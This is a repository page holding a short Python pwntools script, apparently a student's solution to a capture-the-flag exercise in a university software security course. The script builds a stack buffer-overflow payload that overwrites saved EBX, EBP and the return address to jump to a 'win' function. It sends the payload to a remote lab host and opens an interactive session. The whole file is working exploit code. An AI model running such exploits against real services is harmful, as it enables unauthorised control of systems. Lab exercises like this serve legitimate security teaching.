didas/ssof_labs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
ssof_labs/pa/lab6/chall_super_secure_system.py
didas72 555b9062f3 Lab6
2025-12-20 16:49:47 +00:00

16 lines
299 B
Python
Raw Permalink Blame History

from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25155
WIN_ADDR = p32(0x080487d9)
EBX = p32(0x804a001) # Has NULL byte
EBP = p32(0xffffcdd8)
#conn = process("./check")
conn = remote(HOST, PORT)
pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
input()
conn.send(pl)
conn.interactive()
Reference in New Issue View Git Blame Copy Permalink